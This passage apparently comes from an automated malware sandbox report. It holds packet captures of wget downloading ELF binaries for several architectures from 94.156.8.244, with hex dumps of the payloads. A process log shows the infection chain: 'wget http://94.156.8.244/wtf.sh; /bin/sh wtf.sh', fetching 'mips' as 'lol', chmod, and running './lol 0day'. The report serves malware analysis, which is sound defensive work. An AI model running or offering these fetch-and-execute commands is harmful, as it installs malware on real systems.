18 21 04 8d f3 6e 10 d4 11 d5 0b 41 09 00 10 d4 42 61 18 21 11 89 0f d1 18 21 0e 89 e3 6f 26 4f f6 6e 2b 41 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 e3 6f 26 4f f6 6e 0b 00 09 00 09 00 00 00 00 00 84 02 41 00 20 06 42 00 98 02 42 00 00 00 00 00 00 ee f6 65 f3 66 66 2f 46 2f 07 d0 06 2f 04 d4 04 d7 06 d1 0b 41 09 00 05 d1 2b 41 09 00 09 00 40 64 40 00 94 00 40 00 80 db 40 00 0c c3 40 00 e8 b8 40 00 00 00 00 00 00 00 00 00 00 00 00 00 86 2f 96 2f 43 69 a6 2f 5c 6a b6 2f 6c 6b c6 2f d6 2f 73 6d 22 4f 2c d8 f7 51 0b 48 1c 6c ff 88
                                                                  Data Ascii: ELF*@4\4 (@@BBQtd//"On#*@#*@o&Onl///a"O!nab("q(Bab("q!A)o&OnihBBA/"O!nABa!!o&On+Ao&OnA BBeff/F//A+A@d@@@@@//Ci/\j/lk//sm"O,QHl
                                                                  Mar 29, 2024 10:40:39.498064995 CET1286INData Raw: 01 8d 15 40 0c 8b 26 4f f6 6d f6 6c f6 6b f6 6a f6 69 f6 68 0b 00 09 00 09 00 09 00 09 00 09 00 0b 48 09 00 ff 88 0b 8d 08 20 19 8b 1f d0 0b 40 93 64 1f d0 0b 40 09 00 03 64 1e d0 0b 40 09 e5 1d d1 0b 41 00 e4 09 00 09 00 09 00 09 00 09 00 09 00
                                                                  Data Ascii: @&OmlkjihH @d@d@AafFgrb#a`33`@~#aqaa1s"adeWAf@,@@@@8B<B//"O3dH$(T
                                                                  Mar 29, 2024 10:40:39.498116970 CET1286INData Raw: 09 00 09 00 09 00 20 61 1c 61 10 36 1b 8d 04 72 01 73 23 65 30 34 f6 8f 04 72 0b 00 09 00 09 00 09 00 09 00 09 00 0b 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 52 64 48 24 0c 89 07 d1 2b 41 0a e5
                                                                  Data Ascii: aa6rs#e04rRdH$+A`@/////"OKbrej"\eEd Lua)abBqK(ebrd\e"Ej Lub),
                                                                  Mar 29, 2024 10:40:39.498188972 CET1286INData Raw: fc 30 15 46 7d 67 ed 61 7d 1f cd 62 10 10 be 63 21 10 34 10 02 8d 48 e7 18 a1 48 e0 fc 37 71 67 34 e6 fc 36 00 e8 7d 62 60 66 42 72 2d 61 1c 63 18 43 19 41 1b 23 fd 51 6c 66 35 10 da 72 19 41 18 46 1b 26 2d 61 66 10 13 67 1c 61 18 41 19 47 1b 27
                                                                  Data Ascii: 0F}ga}bc!4HH7qg46}b`fBr-acCA#Qlf5rAF&-afgaAG'wrP@7aq^a@lADL,@1S-b,kC8laA#a8NAKB.+++@@B@@QX`Vx1)y)c8y)@Q
                                                                  Mar 29, 2024 10:40:39.498214006 CET1286INData Raw: c6 2f d6 2f e6 2f 22 4f 5a d1 a0 7f 45 1f 54 1f 0b 41 04 e5 58 da 00 e7 93 64 83 65 06 1f 0b 4a 02 e6 0c 60 55 d7 03 e6 93 64 0a 1f 0b 4a 83 65 93 64 83 65 04 e6 07 1f 0b 4a 40 e7 0c 60 01 e7 93 64 83 65 0c 1f 0b 4a 05 e6 0e 60 4b d7 06 e6 93 64
                                                                  Data Ascii: ///"OZETAXdeJ`UdJedeJ@`deJ`KdJedeFJmdeJl@2deJfDdfeJ;degJk7@d3n$~g/@`wRm}g@lBa{
                                                                  Mar 29, 2024 10:40:39.498229980 CET1286INData Raw: 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 09 00 fe 01 fe 02 08 71 34 72 11 1f 22 2f ee ae 09 00 00 40 18 fc ff ff 00 00 80 56 40 00 c0 56 40 00 ac b1 40 00 00 6c 40 00 00 00 ff 00 00 ff 00 00 a0 6e 40 00 09 00 09 00 09 00
                                                                  Data Ascii: q4r"/@V@V@@l@n@/sh/li///Ll/d/"OgRgAddBnddeJk``deJ`deJdmeJ`PS-0+$V,aAF&dL
                                                                  Mar 29, 2024 10:40:39.498269081 CET1286INData Raw: 15 0f f1 50 0c e2 f2 53 93 64 18 40 45 d7 09 1f f2 60 f9 56 44 d1 01 c9 72 95 6b 23 2d 40 1a 1f 39 1f fc 35 07 1f 0b 47 10 e6 6c 90 3f d1 fc 30 04 1f 0b 41 00 e4 09 a0 03 68 09 00 09 00 3a d1 0b 41 09 00 88 30 0a e1 17 30 38 89 5c 93 f8 7f 5b 96
                                                                  Data Ascii: PSd@E`VDrk#-@95Gl?0Ah:A008\[L362/ae2QQAxu8KK26"QnS3(0W9qaa=-e5QR#ay!p12"@dH@@dR@|?&Onml
                                                                  Mar 29, 2024 10:40:39.498292923 CET1286INData Raw: 0b 4a 83 65 93 64 83 65 04 e6 40 e7 0b 4a 03 6e 0c 61 54 e0 00 e7 16 0f 93 64 83 65 0b 4a 05 e6 0e 63 58 e0 87 d7 06 e6 36 0f 93 64 0b 4a 83 65 93 64 83 65 07 e6 83 d7 0b 4a 03 6d 93 64 83 65 11 e6 80 d7 0b 4a 03 6c 93 64 83 65 7d d7 0b 1f 0b 4a
                                                                  Data Ascii: Jede@JnaTdeJcX6dJedeJmdeJlde}JdeJdeJdeJdeJkdeJ@6deJ@7deJ@1deJcl6d_e_g@@6\@@7@<
                                                                  Mar 29, 2024 10:40:39.498316050 CET1286INData Raw: 93 6a 0b 41 16 7a 01 2c 60 e0 fe 00 80 30 01 89 31 af 09 00 1d d1 0b 41 09 00 01 2a fb 50 80 30 01 89 2d af 09 00 18 d1 0b 41 09 00 01 1c fc 50 80 30 01 89 2a af 6c e0 14 d1 0b 41 09 00 02 1c 6c e0 fe 02 28 22 05 89 14 d6 93 64 68 e0 fe 05 0b 46
                                                                  Data Ascii: jAz,`01A*P0-AP0*lAl("dhF(t@x&Onmlkjihl@n@@/Ld/sh/li////"OGVAdeJeHVdJede
                                                                  Mar 29, 2024 10:40:39.498328924 CET1286INData Raw: c7 01 49 d7 18 e6 49 d3 19 42 1a 01 89 27 89 23 5c 31 14 71 10 61 19 47 18 43 6d 48 1c 61 7b 22 41 d7 8b 23 1b 61 1d 40 3b 22 40 d3 0c 32 64 e0 29 27 23 61 29 23 fe 00 29 41 18 43 ff 88 19 47 19 41 6d 42 7b 21 2b 23 3b 21 14 19 01 89 77 af 09 00
                                                                  Data Ascii: IIB'#\1qaGCmHa{"A#a@;"@2d)'#a)#)ACGAmB{!+#;!w4/AL0tX.Aaq!X0n\(jAz+\0j#A*P0fAP0c`A`("Ea&q!X


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  11192.168.2.234317894.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:40.135670900 CET155OUTGET /m68k HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:40.339266062 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 82376
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:45 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:40 GMT
                                                                  Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 04 00 00 00 01 80 00 01 44 00 00 00 34 00 01 40 38 00 00 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 00 00 01 00 00 00 00 80 00 00 00 80 00 00 00 00 01 3c 5e 00 01 3c 5e 00 00 00 05 00 00 20 00 00 00 00 01 00 01 3c 64 80 01 5c 64 80 01 5c 64 00 00 03 94 00 00 ea 78 00 00 00 06 00 00 20 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 4e 56 00 00 61 ff 00 00 00 64 61 ff 00 01 14 c4 4e 5e 4e 75 4e 56 00 00 4a 39 80 01 5f f8 66 3e 22 79 80 01 5c 7c 20 51 4a 88 67 16 58 89 23 c9 80 01 5c 7c 4e 90 22 79 80 01 5c 7c 20 51 4a 88 66 ea 41 f9 00 00 00 00 4a 88 67 0a 48 79 80 01 3c 60 4e 90 58 8f 13 fc 00 01 80 01 5f f8 4e 5e 4e 75 4e 56 00 00 4e 5e 4e 75 4e 56 00 00 41 f9 00 00 00 00 4a 88 67 10 48 79 80 01 5f fa 48 79 80 01 3c 60 4e 90 50 8f 4a b9 80 01 5c 74 67 14 41 f9 00 00 00 00 4a 88 67 0a 48 79 80 01 5c 74 4e 90 58 8f 4e 5e 4e 75 4e 56 00 00 4e 5e 4e 75 9d ce 20 1f 20 4f 48 57 48 51 48 79 80 01 15 96 48 79 80 00 00 94 48 50 2f 00 48 79 80 00 66 7e 4e b9 80 00 e9 0e 4a fc 4e 56 00 00 48 e7 38 20 14 2e 00 0f 18 2e 00 13 16 2e 00 1b 45 f9 80 00 84 94 4e 92 72 ff b2 80 67 00 00 88 4a 80 6e 00 00 82 4e 92 72 ff b2 80 67 20 4a 80 66 24 2f 2e 00 08 61 ff 00 00 e3 40 61 ff 00 00 83 56 48 78 00 09 2f 00 61 ff 00 00 85 32 42 a7 61 ff 00 00 e2 aa 42 81 12 39 80 01 60 12 4a 81 6f ec 22 79 80 01 60 14 20 51 b4 28 00 04 67 12 58 89 42 80 52 80 b2 80 67 d4 20 59 b4 28 00 04 66 f2 2f 2e 00 1c 42 80 10 03 2f 00 2f 2e 00 14
                                                                  Data Ascii: ELFD4@84 (<^<^ <d\d\dx dtQNVadaN^NuNVJ9_f>"y\| QJgX#\|N"y\| QJfAJgHy<`NX_N^NuNVN^NuNVAJgHy_Hy<`NPJ\tgAJgHy\tNXN^NuNVN^Nu OHWHQHyHyHP/Hyf~NJNVH8 ...ENrgJnNrg Jf$/.a@aVHx/a2BaB9`Jo"y` Q(gXBRg Y(f/.B//.
                                                                  Mar 29, 2024 10:40:40.339371920 CET1286INData Raw: 42 80 10 04 2f 00 20 50 4e 90 4f ef 00 0c 42 97 61 ff 00 00 e2 5a 4c ee 04 1c ff f0 4e 5e 4e 75 20 39 80 01 60 18 66 00 01 3c 42 b9 80 01 60 18 20 39 80 01 60 1c 66 00 01 0c 42 b9 80 01 60 1c 20 39 80 01 60 20 66 00 00 dc 42 b9 80 01 60 20 20 39
                                                                  Data Ascii: B/ PNOBaZLN^Nu 9`f<B` 9`fB` 9` fB` 9`$fB`$ 9`(f|B`( 9`,fPB`, 9`0fB`0 9`4g`Hx/aNPB`0 9`4gHx/a0P`Hx/aPB`, 9`0g`Hx/aPB
                                                                  Mar 29, 2024 10:40:40.339389086 CET1286INData Raw: 0c 00 52 01 13 c1 80 01 60 12 48 78 00 06 48 78 00 01 4e 94 24 48 11 7c 00 03 00 04 20 bc 80 00 25 1a 42 80 10 39 80 01 60 12 e5 88 20 40 48 68 00 04 2f 39 80 01 60 14 4e 93 23 c8 80 01 60 14 12 39 80 01 60 12 42 80 10 01 21 8a 0c 00 52 01 13 c1
                                                                  Data Ascii: R`HxHxN$H| %B9` @Hh/9`N#`9`B!R`O.HxN$H| rB9` @Hh/9`N#`9`B!R`HxHxN$H| B9` @Hh/9`N#`9`B!R`
                                                                  Mar 29, 2024 10:40:40.339468002 CET1286INData Raw: 45 c0 48 78 00 19 2f 02 2f 03 4e 92 2f 40 00 58 4f ef 00 1c 2e bc 00 00 00 06 48 78 00 03 48 78 00 02 61 ff 00 00 c1 1c 2f 40 00 48 4f ef 00 0c 72 ff b2 80 67 00 04 e8 41 ef 00 60 21 3c 00 00 00 01 48 78 00 04 2f 08 48 78 00 03 42 a7 2f 00 61 ff
                                                                  Data Ascii: EHx//N/@XO.HxHxa/@HOrgA`!<Hx/HxB/aOrg?KB?GF?FHDOB\.<mJo0/L:@KB<F8FD6PCB.<mHxHxa"o<#, /d$qCAG&I:proI5M5oJoLP
                                                                  Mar 29, 2024 10:40:40.339549065 CET1286INData Raw: 39 43 00 04 24 2f 00 5c 52 82 2f 42 00 5c ba 82 6e 00 fb 96 60 00 fc 86 2f 2f 00 3c 61 ff 00 00 73 4c 58 8f 4c df 7c fc 4f ef 00 34 4e 75 4f ef ff dc 48 e7 3f 3e 2a 6f 00 58 24 2f 00 60 42 83 16 2f 00 5f 48 78 00 04 42 85 1a 2f 00 5b 2f 05 61 ff
                                                                  Data Ascii: 9C$/\R/B\n`//<asLXL|O4NuOH?>*oX$/`B/_HxB/[/a/H<BHx//EN@U/<Hx//N,O$.@Hx//N@NHxHx//N@_O.Hx//N(@/<Hx//N&@O.B//N/@THxHx/
                                                                  Mar 29, 2024 10:40:40.339643002 CET1286INData Raw: 00 00 57 e0 38 80 0c 6f ff ff 00 42 66 00 fe 02 60 a6 06 80 ff ff fc 00 46 80 27 40 00 10 38 af 00 40 39 6f 00 42 00 02 39 43 00 04 24 2f 00 4c 52 82 2f 42 00 4c ba 82 6e 00 fc 72 60 00 fd 5a 2f 07 61 ff 00 00 6e 2c 58 8f 4c df 7c fc 4f ef 00 24
                                                                  Data Ascii: W8oBf`F'@8@9oB9C$/LR/BLnr`Z/an,XL|O$NuOH?>$/PB/OB/GHx/a&HHx/a(H/<Hx//EN?@NO.Hx//N<@HxB//N>O.Hx//NB@BDBHBLOp
                                                                  Mar 29, 2024 10:40:40.339670897 CET1286INData Raw: 00 00 67 92 00 40 08 00 2f 00 48 78 00 04 2f 0a 61 ff 00 00 67 80 3f 7c 00 02 01 84 20 2f 01 98 24 00 e5 8a 22 00 e9 89 92 82 92 80 d2 81 20 6f 01 a4 d1 c1 4f ef 00 18 0c 28 00 1f 00 14 63 00 01 e6 2f 68 00 10 01 70 0c 6f ff ff 00 3c 67 00 02 12
                                                                  Data Ascii: g@/Hx/ag?| /$" oO(c/hpo<g?o<nHxHop/aBN&Op/@|Ho|Ho`Hx@Hx//aOrg"/`pft(d o28ong BNXrl/ahBHxHxat$@Opf /
                                                                  Mar 29, 2024 10:40:40.339728117 CET1286INData Raw: 1f 40 00 66 42 a7 48 78 00 05 2f 02 2f 04 4e 92 1f 40 00 77 4f ef 00 1c 2e bc 00 00 ff ff 48 78 00 06 2f 02 2f 04 4e 92 2f 40 00 4a 2f 3c 00 00 ff ff 48 78 00 07 2f 02 2f 04 4e 92 2f 40 00 5e 4f ef 00 1c 2e bc 00 00 ff ff 48 78 00 11 2f 02 2f 04
                                                                  Data Ascii: @fBHx//N@wO.Hx//N/@J/<Hx//N/@^O.Hx//N/@R/<Hx//N/@fOBHx//N/@ZHxHx//N/@nOBHx//N*@BHx//N,OBHx//N,@BHx//N&@O.B//N/@nHxHx//
                                                                  Mar 29, 2024 10:40:40.339785099 CET1286INData Raw: 4a 2f 00 63 67 00 fe 52 60 00 fe c6 2f 07 61 ff 00 00 5f 72 58 8f 60 22 3a 7c 00 14 db ef 00 5e 36 2f 00 60 06 43 00 14 22 6f 00 5e 4d e9 00 28 4a 85 6f 00 fd a8 60 00 fd a8 4c df 7c fc 4f ef 00 4c 4e 75 4f ef ff c4 48 e7 3f 3e 28 6f 00 70 24 2f
                                                                  Data Ascii: J/cgR`/a_rX`":|^6/`C"o^M(Jo`L|OLNuOH?>(op$/xB/wHxB/s/a*HBHx//EN@_/<Hx//N/@VO$.@Hx//N@ZHxHx//N@kO.Hx//N/@B/<Hx//N/@VO.
                                                                  Mar 29, 2024 10:40:40.339835882 CET1286INData Raw: 00 00 00 ff e2 a8 d8 80 25 44 00 10 72 ff b2 af 00 50 66 00 fe 98 4e 96 25 40 00 0c 0c 6f ff ff 00 48 66 00 fe 92 4e 96 35 40 00 04 0c 6f ff ff 00 4c 66 00 fe 8c 4e 96 36 80 0c 6f ff ff 00 4e 66 00 fe 88 4e 96 37 40 00 02 0c af 00 00 ff ff 00 3a
                                                                  Data Ascii: %DrPfN%@oHfN5@oLfN6oNfN7@:fN'@>f|N'@Jgt`/aZX`MmJo`L|O<NuOH?>(o$/B/HxB//a/H:BHx//EN@k/<Hx//N/@
                                                                  Mar 29, 2024 10:40:40.542576075 CET1286INData Raw: 2f 0d 2f 06 2f 0b 2f 0a 61 ff 00 00 2a e6 37 40 00 10 20 2f 00 8c 24 00 e5 8a 22 00 e9 89 92 82 92 80 d2 81 39 ab 00 02 18 02 48 78 00 10 48 74 18 00 48 78 40 00 2f 0e 2f 0a 2f 07 61 ff 00 00 9d a4 24 2f 00 a4 52 82 2f 42 00 a4 4f ef 00 30 b4 85
                                                                  Data Ascii: ////a*7@ /$"9HxHtHx@///a$/R/BO0lz`((a>$/t"/A.".4%Dpdfa>d%@oTfa>P5@oXfza><6oZfra>*7@Bfha>'@


                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  12192.168.2.234318894.156.8.24480
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 29, 2024 10:40:42.255381107 CET156OUTGET /sparc HTTP/1.1
                                                                  User-Agent: Wget/1.20.3 (linux-gnu)
                                                                  Accept: */*
                                                                  Accept-Encoding: identity
                                                                  Host: 94.156.8.244
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 10:40:42.459692001 CET711INHTTP/1.1 200 OK
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 83312
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Fri, 29 Mar 2024 06:30:53 GMT
                                                                  Date: Fri, 29 Mar 2024 09:40:42 GMT
                                                                  Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 02 00 00 00 01 00 01 01 a4 00 00 00 34 00 01 43 e0 00 00 00 00 00 34 00 20 00 03 00 28 00 0a 00 09 00 00 00 01 00 00 00 00 00 01 00 00 00 01 00 00 00 01 39 a0 00 01 39 a0 00 00 00 05 00 01 00 00 00 00 00 01 00 01 40 00 00 03 40 00 00 03 40 00 00 00 03 a0 00 00 ea c0 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 04 9d e3 bf 98 40 00 00 28 01 00 00 00 40 00 44 19 01 00 00 00 81 c7 e0 08 81 e8 00 00 9d e3 bf 98 23 00 00 d0 c2 0c 63 a0 80 a0 60 00 12 80 00 19 21 00 00 d0 c2 04 20 1c c4 00 40 00 80 a0 a0 00 22 80 00 0b 03 00 00 00 82 00 60 04 9f c0 80 00 c2 24 20 1c c2 04 20 1c c4 00 40 00 80 a0 a0 00 12 bf ff fb 82 00 60 04 03 00 00 00 82 10 60 00 80 a0 60 00 02 80 00 06 82 10 20 01 11 00 00 8e 7f ff bf bb 90 12 21 a0 82 10 20 01 c2 2c 63 a0 81 c7 e0 08 81 e8 00 00 9d e3 bf 98 81 c7 e0 08 81 e8 00 00 9d e3 bf 98 03 00 00 00 82 10 60 00 80 a0 60 00 02 80 00 06 11 00 00 8e 13 00 00 d0 90 12 21 a0 7f ff bf aa 92 12 63 a4 03 00 00 d0 07 00 00 00 c4 00 60 10 86 10 e0 00 80 a0 a0 00 02 80 00 07 90 10 60 10 80 a0 e0 00 02 80 00 04 01 00 00 00 9f c0 c0 00 01 00 00 00 81 c7 e0 08 81 e8 00 00 9d e3 bf 98 81 c7 e0 08 81 e8 00 00 bc 10 00 00 9c 23 a0 18 d2 03 a0 58 94 03 a0 5c 11 00 00 5a 17 00 00 40 19 00 00 84 90 12 23 cc 96 12 e0 94 98 13 21 4c 9a 10 00 01 40 00 3b a3 01 00 00 00 00 00 00 00 9d e3 bf 98 40 00 22 55 01 00 00 00 80 a2 3f ff 02 80 00 04 80 a2 20 00 04 80 00 04 01 00 00 00 81 c7 e0 08
                                                                  Data Ascii: ELF4C4 (99@@@dtQ@(@D#c`! @"`$ @``` ! ,c``!c``#X\Z@#!L@;@"U?
                                                                  Mar 29, 2024 10:40:42.459827900 CET1286INData Raw: 81 e8 00 00 40 00 22 4c 01 00 00 00 80 a2 3f ff 02 80 00 0a 80 a2 20 00 12 80 00 0a 03 00 00 d0 40 00 3a c2 90 10 00 18 40 00 22 ea 01 00 00 00 40 00 23 46 92 10 20 09 40 00 3a 9c 90 10 20 00 d8 08 63 bc 80 a3 20 00 04 bf ff fc 01 00 00 00 03 00
                                                                  Data Ascii: @"L? @:@"@#F @: c `c@@ ) @ @0!# !#` #$#` %$``
                                                                  Mar 29, 2024 10:40:42.459842920 CET1286INData Raw: c0 00 10 80 20 5e 01 00 00 00 01 00 00 00 9d e3 bf 98 92 10 20 08 40 00 36 73 90 10 20 01 03 00 00 52 82 10 61 90 21 00 00 d0 23 00 00 d0 d2 0c 23 bc a4 10 00 08 c2 22 00 00 c0 2a 20 04 93 2a 60 02 d0 04 63 c0 40 00 36 bd 92 02 60 04 c2 0c 23 bc
                                                                  Data Ascii: ^ @6s Ra!##"* *`c@6`#``,#(`$c" @6] Qa#* "*`c@6`#``,#(`$c" @6H Pa#* "*`c@6
                                                                  Mar 29, 2024 10:40:42.459889889 CET1286INData Raw: d0 24 63 c0 e4 22 00 01 92 10 20 08 40 00 35 37 90 10 20 01 84 10 20 0c 03 00 00 45 82 10 63 fc d2 0c 23 bc a4 10 00 08 c4 2a 20 04 c2 22 00 00 93 2a 60 02 d0 04 63 c0 40 00 35 82 92 02 60 04 c2 0c 23 bc 84 00 60 01 c4 2c 23 bc d0 24 63 c0 82 08
                                                                  Data Ascii: $c" @57 Ec#* "*`c@5`#`,#$c`(`" @ @5' !?/#~ @x/ r #
                                                                  Mar 29, 2024 10:40:42.459933043 CET1286INData Raw: e0 0a 92 10 20 14 c0 36 a0 0a 40 00 13 12 90 10 00 1a d0 36 a0 0a 92 10 00 12 d4 14 a0 04 96 10 00 15 c0 34 a0 06 40 00 13 24 90 10 00 1a 86 10 20 02 d0 34 a0 06 c2 07 bf f4 89 28 60 05 83 28 60 03 88 21 00 01 92 10 00 1b 84 06 40 04 c2 06 e0 10
                                                                  Data Ascii: 6@64@$ 4(`(`!@0 6@@2 `' @f(`(` @2&@X&@S6<
                                                                  Mar 29, 2024 10:40:42.459969044 CET1286INData Raw: 85 28 a0 03 c8 07 bf bc 86 20 c0 02 f6 01 00 01 84 00 c0 19 b4 06 e0 18 c2 08 a0 14 80 a0 60 1f 08 80 00 42 a2 06 e0 2c c2 07 bf c0 80 a0 7f ff 02 80 00 4c 01 00 00 00 80 a4 80 13 02 80 00 4e a0 10 00 13 83 37 20 10 80 a0 40 10 02 80 00 53 01 00
                                                                  Data Ascii: ( `B,LN7 @S7`@U`WX& 6@6 6@6`4`@ 4`(`(`!@0
                                                                  Mar 29, 2024 10:40:42.460017920 CET1286INData Raw: fa ed 90 10 00 1a 92 10 00 1b d0 27 be c8 94 10 20 0b 96 10 20 00 7f ff fa e7 90 10 00 1a 92 10 00 1b 94 10 20 0c 96 10 20 01 ae 10 00 08 7f ff fa e1 90 10 00 1a 92 10 00 1b 94 10 20 0d 96 10 20 01 ac 10 00 08 7f ff fa db 90 10 00 1a 92 10 00 1b
                                                                  Data Ascii: ' # @0?
                                                                  Mar 29, 2024 10:40:42.460052967 CET1286INData Raw: 84 28 40 02 84 10 80 04 03 00 00 40 90 04 20 28 82 28 80 01 92 10 00 1d c4 07 be a4 82 10 40 02 40 00 15 70 c2 24 60 0c c2 07 bf f4 82 00 60 01 80 a0 40 18 06 bf ff 12 c2 27 bf f4 af 2e a0 10 ad 2c e0 18 a8 07 60 28 b4 07 60 14 80 a6 20 00 04 80
                                                                  Data Ascii: (@@ ((@@p$``@'.,`(` ?.0`' 5=(`@0 (3 4 @0(``&4 ``&6@8
                                                                  Mar 29, 2024 10:40:42.460081100 CET1286INData Raw: 60 0c 82 08 40 1b 82 10 40 02 c4 07 bf b4 82 08 40 03 07 3f fd ff 82 10 40 04 86 10 e3 ff 82 08 40 0b 17 3f fe ff 96 12 e3 ff c8 07 bf b0 82 10 40 02 c4 07 bf ac 82 08 40 03 07 3f ff 7f 82 10 40 04 86 10 e3 ff 82 08 40 0b 17 3f ff bf 96 12 e3 ff
                                                                  Data Ascii: `@@@?@@?@@?@@?@4`@@@@@t$`4` (`@$`@`'/`'- - , ?,`
                                                                  Mar 29, 2024 10:40:42.460109949 CET1286INData Raw: c4 07 bf cc c6 07 bf d0 c0 27 bf f4 80 a6 20 00 aa 10 00 01 a6 10 00 02 a4 10 00 03 04 80 01 0d a2 10 00 10 d6 07 bf e0 86 0a e0 01 d6 07 bf e8 82 0c 20 01 c8 07 bf dc d8 07 bf e4 84 09 20 01 9a 0a e0 01 83 28 60 15 d6 07 bf ec 85 28 a0 14 88 0b
                                                                  Data Ascii: ' (`( ''(*) +`+ <?'''''c @- (, '@@@@@@@$, , <4
                                                                  Mar 29, 2024 10:40:42.663261890 CET1286INData Raw: 00 1a 96 14 23 ff d0 27 bf c4 92 10 00 1b 94 10 20 06 7f ff f5 ee 90 10 00 1a 96 14 23 ff d0 27 bf c8 92 10 00 1b 94 10 20 07 7f ff f5 e8 90 10 00 1a 96 14 23 ff d0 27 bf cc 92 10 00 1b 94 10 20 11 7f ff f5 e2 90 10 00 1a 96 14 23 ff d0 27 bf d0
                                                                  Data Ascii: #' #' #' #' ' ' ' '


                                                                  System Behavior

                                                                  General

                                                                  Start time (UTC):09:40:16
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh -c "wget http://94.156.8.244/wtf.sh; /bin/sh wtf.sh"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:16
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:16
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget http://94.156.8.244/wtf.sh
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:/bin/sh wtf.sh
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/wget
                                                                  Arguments:wget -O lol http://94.156.8.244/mips
                                                                  File size:548568 bytes
                                                                  MD5 hash:996940118df7bb2aaa718589d4e95c08

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/usr/bin/chmod
                                                                  Arguments:chmod +x lol
                                                                  File size:63864 bytes
                                                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/bin/sh
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:./lol 0day
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:17
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
                                                                  File size:5777432 bytes
                                                                  MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                  Chronological Activities


                                                                  General

                                                                  Start time (UTC):09:40:18
                                                                  Start date (UTC):29/03/2024
                                                                  Path:/tmp/lol
                                                                  Arguments:-
